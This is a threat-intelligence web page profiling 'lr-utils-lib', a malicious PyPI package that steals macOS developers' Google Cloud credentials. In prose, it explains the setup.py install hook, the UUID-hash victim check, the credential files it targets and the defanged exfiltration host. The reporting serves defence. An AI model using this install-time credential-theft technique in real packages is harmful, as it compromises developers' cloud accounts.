Menu

  • Alerts
  • Incidents
  • News
  • APTs
  • Cyber Decoded
  • Cyber Hygiene
  • Cyber Review
  • Cyber Tips
  • Definitions
  • Malware
  • Threat Actors
  • Tutorials

Useful Tools

  • Password generator
  • Report an incident
  • Report to authorities
No Result
View All Result
CTF Hack Havoc
CyberMaterial
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
Hall of Hacks
  • Education
    • Cyber Decoded
    • Definitions
  • Information
    • Alerts
    • Incidents
    • News
  • Insights
    • Cyber Hygiene
    • Cyber Review
    • Tips
    • Tutorials
  • Support
    • Contact Us
    • Report an incident
  • About
    • About Us
    • Advertise with us
Get Help
No Result
View All Result
Hall of Hacks
CyberMaterial
No Result
View All Result
Home Malware

Malicious Python Package Mac – Malware

January 30, 2025
Reading Time: 3 mins read
in Malware
Malicious Python Package Mac – Malware

Malicious Python Package Mac

Type of Malware

Infostealer

Date of initial activity

2024

Motivation

Data Theft

Attack Vectors

Phishing

Type of Information Stolen

Login Credentials

Targeted Systems

MacOS

Overview

In a recent alarming incident, cybersecurity researchers uncovered a malicious Python package named “lr-utils-lib” that was uploaded to the Python Package Index (PyPi), specifically targeting macOS developers. This package contained hidden code designed to execute automatically upon installation, posing a significant threat to unsuspecting users. As the software development community increasingly relies on third-party libraries to streamline their workflows, the introduction of malicious code within popular repositories presents serious implications for supply chain security. Upon activation, “lr-utils-lib” seeks to harvest sensitive Google Cloud Platform (GCP) credentials by extracting critical authentication files from users’ systems. The malware is engineered to operate stealthily, initially verifying the operating system before proceeding to retrieve unique identifiers from the device. Once it identifies its target, the code attempts to access sensitive configuration files typically found in the Google Cloud SDK directory, effectively enabling attackers to gain unauthorized access to cloud resources.

Targets

Individuals

How they operate

The malicious behavior of “lr-utils-lib” is triggered automatically upon installation, thanks to its placement within the setup.py file. This file is a standard part of Python packages and is typically executed when a user installs the package. The first step of the malware’s operation involves verifying that the installation is occurring on a macOS system, its primary target. It achieves this by retrieving the IOPlatformUUID, a unique identifier for the device, and hashing it using the SHA-256 algorithm. Once the hash is generated, the malware compares it against a predefined list of 64 hashed UUIDs that are stored within the malicious code. This targeted approach indicates that the attackers likely have prior knowledge of their intended victims, specifically identifying specific macOS machines they want to exploit. If a match is found, the malware initiates its data exfiltration process, focusing on two critical files within the user’s ~/.config/gcloud directory: application_default_credentials.json and credentials.db. These files typically contain sensitive Google Cloud authentication data, making them prime targets for attackers looking to gain unauthorized access to cloud resources. The next phase of the attack involves transmitting the harvested credentials to a remote server. The malware accomplishes this through HTTPS POST requests, sending the contents of the identified files to a server located at europe-west2-workload-422915[.]cloudfunctions[.]net. By leveraging HTTPS, the attackers attempt to conceal their data exfiltration activities, making it more challenging for victims to detect the malicious behavior. The technical sophistication of the “lr-utils-lib” package highlights the need for developers to maintain a rigorous security posture when integrating third-party packages into their projects. This incident serves as a reminder that the software supply chain is a potential attack vector, and attackers are increasingly employing targeted strategies to compromise systems. Developers must remain vigilant, thoroughly auditing the packages they use and ensuring they come from trusted sources. Moreover, the malicious package also demonstrates how social engineering tactics can augment technical exploits. In this case, a fake LinkedIn profile associated with the package’s creator further illustrates the potential for manipulation and deception. As the digital landscape continues to evolve, attackers are finding new ways to enhance the credibility of their malicious actions, making it imperative for developers to remain critical and discerning in their approach to information verification. Ultimately, the operation of the “lr-utils-lib” package serves as a wake-up call for the software development community. As supply chain attacks become more sophisticated and prevalent, developers and organizations must prioritize robust security practices, including regular package audits and stringent vetting processes. By fostering a culture of security awareness and critical thinking, the development community can better defend against the ever-evolving threats that lurk within the software ecosystem.  
References:
  • Malicious Python Package Targets macOS Developers To Access Their GCP Accounts
Tags: InfostealersMacMacOSMalicious Python Package MacMalwarePhishingPyPIPython
ADVERTISEMENT

Related Posts

Iranian Phishing Campaign (Scam) – Malware

Iranian Phishing Campaign (Scam) – Malware

March 2, 2025
Fake WalletConnect (Infostealer) – Malware

Fake WalletConnect (Infostealer) – Malware

March 2, 2025
SilentSelfie (Infostealer) – Malware

SilentSelfie (Infostealer) – Malware

March 2, 2025
Sniper Dz (Scam) – Malware

Sniper Dz (Scam) – Malware

March 2, 2025
TikTok Malware Scam (Trojan) – Malware

TikTok Malware Scam (Trojan) – Malware

March 2, 2025
Zombinder (Exploit Kit) – Malware

Zombinder (Exploit Kit) – Malware

March 2, 2025

Latest Alerts

Mozilla Urgent Firefox Patch Fixes RCE Flaws

ModiLoader Malware Targets Windows Users

Glibc Flaw Gives Linux Root Access Risk

Fileless Remcos RAT Delivery Via LNK Files

FBI Warns of AI Voice Phishing Scams

APT28 RoundPress Webmail Hack Steals Emails

Subscribe to our newsletter

    Latest Incidents

    Massive DDoS Hits Poland’s Civic Platform

    Arla Plant Cyberattack Halts Operations

    Georgia’s Harbin Clinic Hit by Data Breach

    Hackers Target Swiss Reserve Power Plant

    Coinbase Insider Attack Exposed User Data

    Cyberattack Hits J Batista Group

    CyberMaterial Logo
    • About Us
    • Contact Us
    • Jobs
    • Legal and Privacy Policy
    • Site Map

    © 2025 | CyberMaterial | All rights reserved

    Welcome Back!

    Login to your account below

    Forgotten Password?

    Retrieve your password

    Please enter your username or email address to reset your password.

    Log In

    Add New Playlist

    No Result
    View All Result
    • Alerts
    • Incidents
    • News
    • Cyber Decoded
    • Cyber Hygiene
    • Cyber Review
    • Definitions
    • Malware
    • Cyber Tips
    • Tutorials
    • Advanced Persistent Threats
    • Threat Actors
    • Report an incident
    • Password Generator
    • About Us
    • Contact Us
    • Advertise with us

    Copyright © 2025 CyberMaterial